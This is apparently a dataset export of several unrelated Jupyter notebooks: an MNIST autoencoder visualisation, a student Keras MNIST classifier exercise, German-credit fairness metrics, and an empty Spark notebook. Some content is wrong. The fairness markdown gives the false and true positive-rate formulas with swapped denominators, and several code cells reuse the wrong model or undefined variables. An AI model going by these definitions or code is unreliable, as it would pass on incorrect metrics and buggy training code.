path
stringlengths 7
265
| concatenated_notebook
stringlengths 46
17M
|
---|---|
assets/posts/latent-spaces/vanilla-autoencoder.ipynb | ###Markdown
Create JS data structures
###Code
import json
with open('data/trainX-sample.json', 'w') as out:
json.dump(trainX[:50].tolist(), out)
with open('data/trainY.json', 'w') as out:
json.dump(trainY.tolist(), out)
import matplotlib.pyplot as plt
import numpy as np
import math
px_per_cell_side = 28
cells_per_axis = math.floor(2048/px_per_cell_side)
cells_per_atlas = cells_per_axis**2
n_atlases = math.ceil(trainX.shape[0] / cells_per_atlas)
# create a series of columns and suture them together
for i in range(n_atlases-1): # -1 to just create full atlas files (skip the remainder)
start = i * cells_per_atlas
end = (i+1) * cells_per_atlas
x = trainX[start:end]
cols = []
for j in range(cells_per_axis):
col_start = j*cells_per_axis
col_end = (j+1)*cells_per_axis
col = x[col_start:col_end].reshape(px_per_cell_side*cells_per_axis, px_per_cell_side)
cols.append(col)
im = np.hstack(cols)
im = 255-im # use 255- to flip black and white
plt.imsave('images/atlas-images/atlas-' + str(i) + '.jpg', im, cmap='gray')
# get a single row of images to render to ui
row = 255-x[col_start:col_end]
if False: plt.imsave('images/sample-row.jpg', np.hstack(row), cmap='gray')
print(' * total cells:', n_atlases * cells_per_atlas)
consumed = set()
for i in range(10):
for jdx, j in enumerate(trainY):
if j == i:
im = 255 - trainX[jdx].squeeze()
plt.imsave('images/digits/digit-' + str(i) + '.png', im, cmap='gray')
break
# create low dimensional embeddings
# from MulticoreTSNE import MulticoreTSNE as TSNE
from sklearn.manifold import TSNE, MDS, SpectralEmbedding, Isomap, LocallyLinearEmbedding
from umap import UMAP
from copy import deepcopy
import rasterfairy
import json
def center(arr):
'''Center an array to clip space -0.5:0.5 on all axes'''
arr = deepcopy(arr)
for i in range(arr.shape[1]):
arr[:,i] = arr[:,i] - np.min(arr[:,i])
arr[:,i] = arr[:,i] / np.max(arr[:,i])
arr[:,i] -= 0.5
return arr
def curate(arr):
'''Prepare an array for persistence to json'''
return np.around(center(arr), 4).tolist()
# prepare model inputs
n = 10000 #trainX.shape[0]
sampleX = trainX[:n]
flat = sampleX.reshape(sampleX.shape[0], sampleX.shape[1] * sampleX.shape[2])
# create sklearn outputs
for clf, label in [
#[SpectralEmbedding, 'se'],
#[Isomap, 'iso'],
#[LocallyLinearEmbedding, 'lle'],
#[MDS, 'mds'],
[TSNE, 'tsne'],
[UMAP, 'umap'],
]:
print(' * processing', label)
positions = clf(n_components=2).fit_transform(flat)
with open('data/mnist-positions/' + label + '_positions.json', 'w') as out:
json.dump(curate(positions), out)
import keras.backend as K
import numpy as np
import os, json
# create autoencoder outputs
model = Autoencoder(latent_dim=2)
lr = 0.005
for i in range(10):
lr *= 0.9
print(' * running step:', i, '-- lr:', lr)
K.set_value(model.auto.optimizer.lr, lr)
model.auto.fit(trainX, trainX, batch_size=250, epochs=10)
# save the auto latent positions to disk
auto_positions = model.encoder.predict(sampleX)
with open('data/mnist-positions/auto_positions.json', 'w') as out:
json.dump(curate(auto_positions), out)
# save the decoder to disk
model.decoder.save('data/model/decoder.h5')
os.system('tensorflowjs_converter --input_format keras \
data/model/decoder.h5 \
data/model/decoder')
# save the decoder domain to disk
domains = [[ float(np.min(z[:,i])), float(np.max(z[:,i])) ] for i in range(z.shape[1])]
with open('data/model/decoder-domains.json', 'w') as out:
json.dump(domains, out)
%matplotlib inline
import matplotlib.pyplot as plt
# plot the latent space
z = model.encoder.predict(trainX[:n]) # project inputs into latent space
colors = trainY[:n].tolist() # color points with labels
plt.scatter(z[:,0], z[:,1], marker='o', s=1, c=colors)
plt.colorbar()
import math
px_per_cell_side = 28
cells_per_axis = math.floor(2048/px_per_cell_side)
cells_per_atlas = cells_per_axis**2
n_atlases = math.ceil(trainX.shape[0] / cells_per_atlas)
print(' * total cells:', n_atlases * cells_per_atlas)
# create a series of columns and suture them together
for i in range(n_atlases-1): # -1 to just create full atlas files (skip the remainder)
start = i * cells_per_atlas
end = (i+1) * cells_per_atlas
x = trainX[start:end]
cols = []
for j in range(cells_per_axis):
col_start = j*cells_per_axis
col_end = (j+1)*cells_per_axis
col = x[col_start:col_end].reshape(px_per_cell_side*cells_per_axis, px_per_cell_side)
cols.append(col)
im = np.hstack(cols)
plt.imsave('atlas-' + str(i) + '.jpg', im, cmap='gray')
b = np.hstack(cols)
plt.imshow(b)
###Output
_____no_output_____ |
neural network_Image classification_Jass.ipynb | ###Markdown
MMAI 894 - Exercise 1 Feedforward artificial neural network : Image classificationThe goal of this excercise is to show you how to create your first neural network using the tensorflow/keras library. We will be using the MNIST dataset.Submission instructions:- You cannot edit this notebook directly. Save a copy to your drive, and make sure to identify yourself in the title using name and student number- Do not insert new cells before the final one (titled "Further exploration") - Select File -> Download as .py (important! not as ipynb)- Rename the file: `studentID_lastname_firstname_ex1.py`- Notebook must be able to _restart and run all_- The mark will be assessed on the implementation of the functions with TODO- **Do not change anything outside the functions** unless in the further exploration section- The mark is not based on final accuracy - only on correctness- Do not use any additional libraries than the ones listed below (you may import additional modules from those libraries if needed)References- https://keras.io/getting-started/sequential-model-guide/- https://keras.io/api/utils/python_utils/to_categorical-function- https://scikit-learn.org/stable/modules/generated/sklearn.model_selection.train_test_split.html- https://keras.io/api/layers/core_layers/dense/- https://keras.io/api/layers/regularization_layers/dropout/- https://keras.io/api/models/model_training_apis/ Libraries
###Code
# Import modules
# Add modules as needed
from sklearn.datasets import fetch_openml
from sklearn.model_selection import train_test_split
# For windows laptops add following 2 lines:
# import matplotlib
# matplotlib.use('agg')
import matplotlib.pyplot as plt
import tensorflow.keras as keras
from keras.utils import to_categorical
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Dropout
###Output
_____no_output_____
###Markdown
Data preparation Import data
###Code
def load_data():
# Import MNIST dataset from openml
dataset = fetch_openml('mnist_784', version=1, data_home=None)
# Data preparation
raw_X = dataset['data']
raw_Y = dataset['target']
return raw_X, raw_Y
raw_X, raw_Y = load_data()
###Output
_____no_output_____
###Markdown
Consider the following- what shape is X?- what value ranges does X take? - might this present a problem? - what transformations need to be applied?- what shape is Y?- what value ranges does Y take? - what transformations should be applied?
###Code
print('Q: what shape is X?')
print('Shape of X:', raw_X.shape)
print('\n')
print('Q: what value ranges does X take?')
print('Range of X is from %s to %s' % (raw_X.min(), raw_X.max()))
print('\n')
print(' Q: might this present a problem?')
print(' we neeed to transform the data from 0 to 1 range.')
print('\n')
print(' Q: what transformations need to be applied?')
print(' divide it by 255')
print('\n')
print('Q: what shape is Y?')
print('Shape of Y:', raw_Y.shape)
print('\n')
print('Q: what value ranges does Y take?')
print('Range of X is from %s to %s' % (raw_Y.min(), raw_Y.max()))
print('\n')
print(' Q: what transformations should be applied?')
print(' Convert it to categorical data')
def clean_data(raw_X, raw_Y):
# TODO: clean and QA raw_X and raw_Y
# DO NOT CHANGE THE INPUTS OR OUTPUTS TO THIS FUNCTION
print('Shape of X:', raw_X.shape)
print('Range of X is from %s to %s' % (raw_X.min(), raw_X.max()))
print('X labels:', raw_X)
cleaned_X = raw_X.astype('float32') / 255
print('\nShape of Y:', raw_Y.shape)
print('Range of X is from %s to %s' % (raw_Y.min(), raw_Y.max()))
print('X labels:', raw_Y)
# Categorically encode labels
cleaned_Y = to_categorical(raw_Y, 10)
return cleaned_X, cleaned_Y
cleaned_X, cleaned_Y = clean_data(raw_X, raw_Y)
print('\n')
print('Clean Data:')
print('-----------')
clean_data(cleaned_X, cleaned_Y)
###Output
Shape of X: (70000, 784)
Range of X is from 0.0 to 255.0
X labels: [[0. 0. 0. ... 0. 0. 0.]
[0. 0. 0. ... 0. 0. 0.]
[0. 0. 0. ... 0. 0. 0.]
...
[0. 0. 0. ... 0. 0. 0.]
[0. 0. 0. ... 0. 0. 0.]
[0. 0. 0. ... 0. 0. 0.]]
Shape of Y: (70000,)
Range of X is from 0 to 9
X labels: ['5' '0' '4' ... '4' '5' '6']
Clean Data:
-----------
Shape of X: (70000, 784)
Range of X is from 0.0 to 1.0
X labels: [[0. 0. 0. ... 0. 0. 0.]
[0. 0. 0. ... 0. 0. 0.]
[0. 0. 0. ... 0. 0. 0.]
...
[0. 0. 0. ... 0. 0. 0.]
[0. 0. 0. ... 0. 0. 0.]
[0. 0. 0. ... 0. 0. 0.]]
Shape of Y: (70000, 10)
Range of X is from 0.0 to 1.0
X labels: [[0. 0. 0. ... 0. 0. 0.]
[1. 0. 0. ... 0. 0. 0.]
[0. 0. 0. ... 0. 0. 0.]
...
[0. 0. 0. ... 0. 0. 0.]
[0. 0. 0. ... 0. 0. 0.]
[0. 0. 0. ... 0. 0. 0.]]
###Markdown
Data split- Split your data into a train set (50%), validation set (20%) and a test set (30%). You can use scikit-learn's train_test_split function.
###Code
def split_data(cleaned_X, cleaned_Y):
# TODO: split the data
# DO NOT CHANGE THE INPUTS OR OUTPUTS TO THIS FUNCTION
train_ratio = 0.50
validation_ratio = 0.20
test_ratio = 0.30
X_test, X_train, Y_test, Y_train = train_test_split(cleaned_X, cleaned_Y, test_size = 1-train_ratio, random_state=42)
X_val, X_test, Y_val, Y_test = train_test_split(X_test, Y_test, train_size = validation_ratio/(test_ratio + validation_ratio), random_state = 42)
return X_val, X_test, X_train, Y_val, Y_test, Y_train
X_val, X_test, X_train, Y_val, Y_test, Y_train = split_data(cleaned_X, cleaned_Y)
print('X_train:',X_train.shape)
print('X_val:',X_val.shape)
print('X_test:',X_test.shape)
###Output
X_train: (35000, 784)
X_val: (14000, 784)
X_test: (21000, 784)
###Markdown
[Optional]: plot your data with matplotlib- Hint: you will need to reshape the row's data into a 28x28 matrix- https://matplotlib.org/3.1.1/api/_as_gen/matplotlib.pyplot.imshow.html- https://docs.scipy.org/doc/numpy/reference/generated/numpy.reshape.html
###Code
def viz_data(X_train):
X_train_sample = X_train[:10, ]
# TODO: (optional) plot your data with matplotlib
# DO NOT CHANGE THE INPUTS OR OUTPUTS TO THIS FUNCTION
for i in range(10):
img = X_train_sample[i].reshape((28,28))
plt.subplot(2,5,i+1)
plt.imshow(img, cmap="Greys")
#plt.show()
viz_data(X_train)
###Output
_____no_output_____
###Markdown
Model Neural network structure- For this network, we'll use 2 hidden layers- Layer 1 should have 128 nodes, a dropout rate of 20%, and relu as its activation function- Layer 2 should have 64 nodes, a dropout rate of 20%, and relu as its activation function- The last layer should map back to the 10 possible MNIST class. Use softmax as the activation
###Code
def build_model():
# TODO: build the model,
# HINT: you should have Total params: 109,386
# DO NOT CHANGE THE INPUTS OR OUTPUTS TO THIS FUNCTION
model = Sequential()
#Adding the input layer and the first hidden layer
model.add(keras.layers.Flatten(input_shape=[28*28]))
model.add(Dense(units=128, activation='relu'))
#dropout rate of 20%
model.add(Dropout(.2))
#Layer 2
model.add(Dense(units=64, activation='relu'))
model.add(Dropout(.20))
# Adding the output layer
model.add(Dense(units=10, activation='softmax', ))
return model
model = build_model()
model.summary()
###Output
Model: "sequential"
_________________________________________________________________
Layer (type) Output Shape Param #
=================================================================
flatten (Flatten) (None, 784) 0
_________________________________________________________________
dense (Dense) (None, 128) 100480
_________________________________________________________________
dropout (Dropout) (None, 128) 0
_________________________________________________________________
dense_1 (Dense) (None, 64) 8256
_________________________________________________________________
dropout_1 (Dropout) (None, 64) 0
_________________________________________________________________
dense_2 (Dense) (None, 10) 650
=================================================================
Total params: 109,386
Trainable params: 109,386
Non-trainable params: 0
_________________________________________________________________
###Markdown
Model compilation- what loss function should you use?- Note your choice of optimizer- Include accuracy as a metric Model training- Use a batch size of 128, and train for 12 epochs- Use verbose training, include validation data
###Code
def compile_model(model):
# TODO: compile the model
# DO NOT CHANGE THE INPUTS OR OUTPUTS TO THIS FUNCTION
model.compile(optimizer = "adam", loss = 'categorical_crossentropy', metrics = ['accuracy'])
return model
def train_model(model, X_train, Y_train, X_val, Y_val):
# TODO: train the model
# DO NOT CHANGE THE INPUTS OR OUTPUTS TO THIS FUNCTION
history = model.fit(X_train, Y_train, validation_data=(X_val, Y_val), batch_size= 128, epochs = 12, verbose=1)
return model, history
model = compile_model(model)
model, history = train_model(model, X_train, Y_train, X_val, Y_val)
###Output
Epoch 1/12
274/274 [==============================] - 2s 5ms/step - loss: 0.9531 - accuracy: 0.7049 - val_loss: 0.2358 - val_accuracy: 0.9279
Epoch 2/12
274/274 [==============================] - 1s 4ms/step - loss: 0.2774 - accuracy: 0.9187 - val_loss: 0.1623 - val_accuracy: 0.9506
Epoch 3/12
274/274 [==============================] - 1s 4ms/step - loss: 0.1997 - accuracy: 0.9403 - val_loss: 0.1402 - val_accuracy: 0.9577
Epoch 4/12
274/274 [==============================] - 1s 4ms/step - loss: 0.1676 - accuracy: 0.9504 - val_loss: 0.1211 - val_accuracy: 0.9635
Epoch 5/12
274/274 [==============================] - 1s 4ms/step - loss: 0.1448 - accuracy: 0.9563 - val_loss: 0.1107 - val_accuracy: 0.9661
Epoch 6/12
274/274 [==============================] - 1s 4ms/step - loss: 0.1188 - accuracy: 0.9641 - val_loss: 0.1032 - val_accuracy: 0.9693
Epoch 7/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0997 - accuracy: 0.9692 - val_loss: 0.0973 - val_accuracy: 0.9694
Epoch 8/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0900 - accuracy: 0.9733 - val_loss: 0.0922 - val_accuracy: 0.9713
Epoch 9/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0841 - accuracy: 0.9750 - val_loss: 0.0924 - val_accuracy: 0.9724
Epoch 10/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0743 - accuracy: 0.9768 - val_loss: 0.0919 - val_accuracy: 0.9721
Epoch 11/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0682 - accuracy: 0.9792 - val_loss: 0.0908 - val_accuracy: 0.9728
Epoch 12/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0682 - accuracy: 0.9769 - val_loss: 0.0920 - val_accuracy: 0.9753
###Markdown
Model evaluation- Show the performance on the test set- What is the difference between "evaluate" and "predict"?- Identify a few images the model classifies incorrectly. Any observations?
###Code
def eval_model(model, X_test, Y_test):
# TODO: evaluate the model
# DO NOT CHANGE THE INPUTS OR OUTPUTS TO THIS FUNCTION
score = model.evaluate(X_test, Y_test, verbose=0)
test_loss = score[0]
test_accuracy = score[1]
print('Model performance on the test set:')
print('Test cross-entropy loss: %0.5f' % score[0])
print('Test accuracy: %0.2f' % score[1])
return test_loss, test_accuracy
test_loss, test_accuracy = eval_model(model, X_test, Y_test)
print('\nevaluate() function evaluate the trainig model with the test set, it computes the loss based on the input passed and other evaluation metric like Accuracy' )
print('whereas predict() function genrates output prediction of the model ')
predictions = model.predict([X_test])
print('\nPredictions are output probability distributions:')
print('First prediction:\n', predictions[0])
print('\n')
import numpy as np
predicted_classes = model.predict_classes(X_test)
correct_indices = np.nonzero(predicted_classes == Y_test.argmax(axis=-1))[0]
incorrect_indices = np.nonzero(predicted_classes != Y_test.argmax(axis=-1))[0]
print('\nA few incorrectly classified images:')
plt.figure(2, figsize=(7,7))
for i, incorrect in enumerate(incorrect_indices[:9]):
plt.subplot(3,3,i+1)
plt.imshow(X_test[incorrect].reshape(28,28), cmap='gray', interpolation='none')
plt.title("Predicted {}, Class {}".format(predicted_classes[incorrect], Y_test[incorrect].argmax(axis=-1)))
plt.xticks([])
plt.yticks([])
###Output
Model performance on the test set:
Test cross-entropy loss: 0.09535
Test accuracy: 0.97
evaluate() function evaluate the trainig model with the test set, it computes the loss based on the input passed and other evaluation metric like Accuracy
whereas predict() function genrates output prediction of the model
Predictions are output probability distributions:
First prediction:
[2.3445311e-07 6.4776609e-06 1.9541719e-06 3.4884238e-07 8.4975655e-12
9.9996185e-01 2.4509511e-05 2.1627974e-11 4.5998631e-06 6.6054263e-08]
###Markdown
Further exploration (Not evaluated)Looking for something else to do?- Transform your code to do hyperparameter search. - You can vary the number of nodes in the layers, the drop out rate, the optimizer and the parameters in Adam, the batch size, etc.
###Code
#Correct predicted
plt.figure(1, figsize=(7,7))
for i, correct in enumerate(correct_indices[:9]):
plt.subplot(3,3,i+1)
plt.imshow(X_test[correct].reshape(28,28), cmap='gray', interpolation='none')
plt.title("Predicted {}, Class {}".format(predicted_classes[correct], Y_test[correct].argmax(axis=-1)))
plt.xticks([])
plt.yticks([])
###Output
_____no_output_____
###Markdown
Plot loss trajectory throughout training.
###Code
# Plot loss trajectory throughout training.
plt.figure(1, figsize=(14,5))
plt.subplot(1,2,1)
plt.plot(history.history['loss'], label='train')
plt.plot(history.history['val_loss'], label='valid')
plt.xlabel('Epoch')
plt.ylabel('Cross-Entropy Loss')
plt.legend()
plt.subplot(1,2,2)
plt.plot(history.history['accuracy'], label='train')
plt.plot(history.history['val_accuracy'], label='valid')
plt.xlabel('Epoch')
plt.ylabel('Accuracy')
plt.legend()
###Output
_____no_output_____
###Markdown
Increased the number of layers
###Code
def build_model1():
# TODO: build the model,
# HINT: you should have Total params: 109,386
# DO NOT CHANGE THE INPUTS OR OUTPUTS TO THIS FUNCTION
model_1 = Sequential()
IMGSIZE = 784
#Adding the input layer and the first hidden layer
model_1.add(Dense(units=128, activation='relu', input_shape=(IMGSIZE, )))
#dropout rate of 10%
model_1.add(Dropout(.1))
#Layer 2
model_1.add(Dense(units=64, activation='relu', input_shape=(IMGSIZE, )))
model_1.add(Dropout(.10))
#Layer 3
model_1.add(Dense(units=34, activation='relu', input_shape=(IMGSIZE, )))
#Layer 4
model_1.add(Dense(units=34, activation='relu', input_shape=(IMGSIZE, )))
# Adding the output layer
model_1.add(Dense(units=10, activation='softmax', input_shape=(IMGSIZE, )))
return model_1
model_1 = build_model1()
model_1.summary()
def compile_model1(model_1):
# TODO: compile the model
# DO NOT CHANGE THE INPUTS OR OUTPUTS TO THIS FUNCTION
model_1.compile(optimizer = "sgd", loss = 'categorical_crossentropy', metrics = ['accuracy'])
return model_1
def train_model1(model_1, X_train, Y_train, X_val, Y_val):
# TODO: train the model
# DO NOT CHANGE THE INPUTS OR OUTPUTS TO THIS FUNCTION
history_1 = model_1.fit(X_train, Y_train, validation_data=(X_val, Y_val), batch_size= 128, epochs = 12, verbose=1)
return model_1, history_1
model_1 = compile_model(model_1)
model_1, history_1 = train_model(model, X_train, Y_train, X_val, Y_val)
###Output
Epoch 1/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0587 - accuracy: 0.9819 - val_loss: 0.0878 - val_accuracy: 0.9756
Epoch 2/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0555 - accuracy: 0.9817 - val_loss: 0.0862 - val_accuracy: 0.9759
Epoch 3/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0522 - accuracy: 0.9831 - val_loss: 0.0930 - val_accuracy: 0.9751
Epoch 4/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0519 - accuracy: 0.9825 - val_loss: 0.0883 - val_accuracy: 0.9753
Epoch 5/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0456 - accuracy: 0.9849 - val_loss: 0.0890 - val_accuracy: 0.9756
Epoch 6/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0455 - accuracy: 0.9854 - val_loss: 0.0893 - val_accuracy: 0.9754
Epoch 7/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0423 - accuracy: 0.9858 - val_loss: 0.0898 - val_accuracy: 0.9765
Epoch 8/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0385 - accuracy: 0.9874 - val_loss: 0.0878 - val_accuracy: 0.9756
Epoch 9/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0366 - accuracy: 0.9877 - val_loss: 0.0938 - val_accuracy: 0.9760
Epoch 10/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0369 - accuracy: 0.9879 - val_loss: 0.0920 - val_accuracy: 0.9776
Epoch 11/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0361 - accuracy: 0.9875 - val_loss: 0.0972 - val_accuracy: 0.9756
Epoch 12/12
274/274 [==============================] - 1s 4ms/step - loss: 0.0344 - accuracy: 0.9888 - val_loss: 0.0984 - val_accuracy: 0.9751
###Markdown
###Code
## Perform Hyperparameter Optimization
from keras.wrappers.scikit_learn import KerasClassifier
from sklearn.model_selection import GridSearchCV
from keras.layers import Dense, Activation, Embedding, Flatten, LeakyReLU, BatchNormalization, Dropout
from keras.activations import relu, sigmoid, softmax
def create_model(layers, activation):
model = Sequential()
for i, nodes in enumerate(layers):
if i == 0:
model.add(Dense(nodes, input_dim = X_train.shape[1]))
model.add(Activation(activation))
model.add(Dropout(0.3))
else:
model.add(Dense(nodes))
model.add(Activation(activation))
model.add(Dropout(0.3))
model.add(Dense(10, activation='softmax'))
model.compile(optimizer='adam', loss='categorical_crossentropy', metrics=['accuracy'])
return model
model = KerasClassifier(build_fn=create_model, verbose=0)
layers = [[120], [80,60], [45,30,15]]
activations = ['sigmoid', 'relu']
param_grid = dict(layers=layers, activation=activations, batch_size=[128, 256], epochs=[30])
grid = GridSearchCV(estimator = model, param_grid=param_grid, cv=5)
#grid = GridSearchCV(estimator=model, param_grid=param_grid,cv=5)
grid_result = grid.fit(X_train, Y_train)
print(grid_result.best_score_,grid_result.best_params_)
###Output
_____no_output_____ |
notebooks/_old/fairness_metrics.ipynb | ###Markdown
Fairness MetricsThis notebook implements the statistical fairness metrics from:*Towards the Right Kind of Fairness in AI* by Boris Ruf and Marcin Detyniecki (2021)https://arxiv.org/abs/2102.08453Example with the `german-risk-scoring.csv` dataset.Contributeurs : Xavier Lioneton & Francis Wolinski Imports
###Code
# imports
import numpy as np
import pandas as pd
from pandas.api.types import is_numeric_dtype
from sklearn.linear_model import LogisticRegression
from sklearn.metrics import confusion_matrix
from sklearn.model_selection import train_test_split
from sklearn.preprocessing import OneHotEncoder
from IPython.display import display, Markdown
###Output
_____no_output_____
###Markdown
Data Load
###Code
# dataset
data = pd.read_csv('german-risk-scoring.csv')
data.info()
# target
data['Cost Matrix(Risk)'].value_counts()
# Personal status and sex
data["Personal status and sex"].value_counts()
###Output
_____no_output_____
###Markdown
Data Prep
###Code
# create sex column
data["sex"] = data["Personal status and sex"].apply(lambda x : x.split(":")[0])
# create X=features, y=target
X = data.drop(columns = 'Cost Matrix(Risk)')
y = data['Cost Matrix(Risk)'].map({"Good Risk": 1, "Bad Risk": 0})
# type modifications
cols_cat = [
'Status of existing checking account',
'Credit history',
'Purpose',
'Savings account/bonds',
'Present employment since',
'Personal status and sex',
'Other debtors / guarantors',
'Property',
'Other installment plans',
'Housing',
'Job',
'Telephone',
'foreign worker',
'sex'
]
cols_num = [
'Duration in month',
'Credit amount',
'Installment rate in percentage of disposable income',
'Present residence since',
'Age in years',
'Number of existing credits at this bank',
'Number of people being liable to provide maintenance for',
]
for col in cols_cat:
data[col] = data[col].astype(str)
for col in cols_num:
data[col] = data[col].astype(float)
cols = cols_cat + cols_num
# unique values of categorical columns
X[cols_cat].nunique()
# all to numbers
encoder = OneHotEncoder()
X_cat = encoder.fit_transform(X[cols_cat]).toarray()
X_num = X[cols_num]
X_prep = np.concatenate((X_num, X_cat), axis=1)
X_prep.shape
# data prepared
cols = data[cols_num].columns.tolist() + encoder.get_feature_names(input_features=X[cols_cat].columns).tolist()
data_prep = pd.DataFrame(X_prep, columns=cols)
data_prep.shape
# data prepared
data_prep.head()
###Output
_____no_output_____
###Markdown
Machine Learning
###Code
# split train test
X_train, X_test, y_train, y_test = train_test_split(data_prep, y, test_size=0.2, random_state=42)
X_train = X_train.copy()
X_test = X_test.copy()
print(X_train.shape, X_test.shape, y_train.shape, y_test.shape)
###Output
(800, 63) (200, 63) (800,) (200,)
###Markdown
Train Model
###Code
# train model
clf = LogisticRegression(random_state=0, n_jobs=8, max_iter=500)
clf.fit(X_train, y_train)
###Output
_____no_output_____
###Markdown
Confusion mattrix
###Code
# Schema of confusion matrix
df = pd.DataFrame([['True negatives (TN)', 'False positives (FP)'], ['False negatives (FN)', 'True positives (TP)']], index=['Y = 0', 'Y = 1'], columns=['Ŷ = 0', 'Ŷ = 1'])
df = df.reindex(['Y = 1', 'Y = 0'])
df = df[['Ŷ = 1', 'Ŷ = 0']]
display(Markdown('**Schema of confusion matrix**'))
display(df)
# function pretty_confusion_mattrix()
def pretty_confusion_mattrix(y_label, y_pred, title=None):
"""Pretty print the confusion matrix computed by scikit-learn"""
_TN, _FP, _FN, _TP = confusion_matrix(y_label, y_pred).flatten()
array = [[_TP, _FN], [_FP, _TN]]
df = pd.DataFrame(array, index=['Y = 1', 'Y = 0'], columns=['Ŷ = 1', 'Ŷ = 0'])
if title is not None:
display(Markdown(title))
display(df)
# test dataset
y_pred = clf.predict(X_test)
pretty_confusion_mattrix(y_test, y_pred, title='**Confusion matrix for the test dataset**')
# function pretty_confusion_mattrix_by_subgroup()
def pretty_confusion_mattrix_by_subgroup(X, col, X_test, y_label, y_pred, q=4):
"""Pretty print the confusion matrices by subgroup
X: dataset
col: used for spliting in subgroups
X_test: test dataset
y_label: target for test dataset
y_pred: predictions for test dataset
q: quartile used for numerical column"""
# if col is numeric, use quantile
cat = pd.qcut(X[col], q) if is_numeric_dtype(X[col]) else X[col]
# select test data
cat = cat.loc[X_test.index]
# switch y_pred to Series so as to be able to select by subgroup
y_pred = pd.Series(y_pred, index=y_label.index)
# loop on subgroups
for value in sorted(cat.unique()):
X_select = X_test.loc[cat == value]
pretty_confusion_mattrix(y_label.loc[X_select.index],
y_pred.loc[X_select.index],
title=f'**Subgroup**: {col} = {value}')
pretty_confusion_mattrix_by_subgroup(X, 'sex', X_test, y_test, y_pred)
pretty_confusion_mattrix_by_subgroup(X, 'Age in years', X_test, y_test, y_pred)
###Output
_____no_output_____
###Markdown
Metrics derived from confusion matrix**Actual postitives**This number is the sum of the true positives and the false negatives, which can be viewed as missedtrue positives.$P = TP + FN$**Actual negatives**This number is the sum of the true negatives and the false positives, which again can be viewed as missed true negatives.$N = TN + FP$**Base rate**This number, sometimes also called the prevalence rate, represents the proportion of actual positives with respect to the entire data set.$BR = \frac{P}{P + N}$**Positive rate**This number is the overall rate of positively classified instances, including both correct and incorrect decisions.$PR = \frac{TP + FP}{P + N}$**Negative rate**This number is the ratio of negative classification, again irrespective of whether the decisions were correct or incorrect.$NR = \frac{TN + FN}{P + N}$**Accuracy**This number is the ratio of the correctly classified instances (positive and negative) of all decisions.$ACC = \frac{TP + TN}{P + N}$**Misclassiffication rate**This number is the ratio of the misclassified instances over all decisions.$MR = \frac{FN + FP}{P + N}$**True positive rate (recall)**This number describes the proportions of correctly classified positive instances.$TPR = \frac{TP}{P}$**True negative rate**This number describes the proportions of correctly classified negative instances.$TNR = \frac{TN}{N}$**False positive rate**This number denotes the proportion of actual negatives which was falsely classified as positive.$FPR = \frac{FP}{P}$**False negative rate (silence)**This number describes the proportion of actual positives which was misclassified as negative.$FNR = \frac{FN}{N}$**False discovery rate (noise)**This number describes the share of misclassified positive classifications of all positive predictions.$FDR = \frac{FP}{TP + FP}$**Positive predicted value (precision)**This number describes the ratio of samples which were correctly classified as positive from all the positive predictions.$PPV = \frac{TP}{TP + FP}$**False omission rate**This number describes the proportion of false negative predictions of all negative predictions.$FOR = \frac{FN}{TN + FN}$**Negative predicted value**This number describes the ratio of samples which were correctly classified as negative from all the negative predictions.$NPV = \frac{TN}{TN + FN}$
###Code
# function pretty_confusion_mattrix()
def pretty_fairness_confusion_mattrix(y_label, y_pred, title=None):
"""Pretty print fairness confusion matrix
y_label: target for test dataset
y_pred: predictions for test dataset
title: string to display in Markdown"""
# compute fairness metrics
_TN, _FP, _FN, _TP = confusion_matrix(y_label, y_pred).flatten()
_P = _TP + _FN
_N = _FP + _TN
_BR = _P / (_P + _N)
_PR = (_TP + _FP) / (_P + _N)
_NR = (_TN + _FN) / (_P + _N)
_TPR = _TP / _P
_TNR = _TN / _N
_FDR = _FP / (_TP + _FP)
_FOR = _FN / (_TN + _FN)
# build the output dataframe
array = [[_TP, _FN, f'TPR = {_TPR:.2f}'],
[_FP, _TN, f'TNR = {_TNR:.2f}'],
[f'FDR = {_FDR:.2f}', f'FOR = {_FOR:.2f}', f'BR = {_BR:.2f}'],
[f'PR = {_PR:.2f}', f'NR = {_NR:.2f}', ''],
]
df = pd.DataFrame(array, index=['Y = 0', 'Y = 1', '', ' '], columns=['Ŷ = 0', 'Ŷ = 1', ''])
if title is not None:
display(Markdown(title))
display(df.style.set_table_styles([{'selector': 'td', 'props':[('text-align', 'center')]},
{'selector': 'th', 'props': [('text-align', 'center')]}],
overwrite=False))
pretty_fairness_confusion_mattrix(y_test, y_pred, title='**Fairness confusion matrix**')
# function pretty_fairness_confusion_mattrix_by_subgroup()
def pretty_fairness_confusion_mattrix_by_subgroup(X, col, X_test, y_label, y_pred, q=4):
"""Pretty print fairness confusion matrix by subgroup
X: dataset
col: used for spliting in subgroups
X_test: test dataset
y_label: target for test dataset
y_pred: predictions for test dataset
q: quartile used for numerical colum"""
# if col is numeric, use quantile
cat = pd.qcut(X[col], q) if is_numeric_dtype(X[col]) else X[col]
# select test data
cat = cat.loc[X_test.index]
# switch y_pred to Series so as to be able to select by subgroup
y_pred = pd.Series(y_pred, index=y_label.index)
# loop on subgroups
for value in sorted(cat.unique()):
X_select = X_test.loc[cat == value]
pretty_fairness_confusion_mattrix(y_label.loc[X_select.index],
y_pred.loc[X_select.index],
title=f'**Subgroup**: {col} = {value}')
pretty_fairness_confusion_mattrix_by_subgroup(X, 'sex', X_test, y_test, y_pred)
pretty_fairness_confusion_mattrix_by_subgroup(X, 'Age in years', X_test, y_test, y_pred)
###Output
_____no_output_____ |
3-spark-kubernetes/3-spark-kubernetes.ipynb | ###Markdown
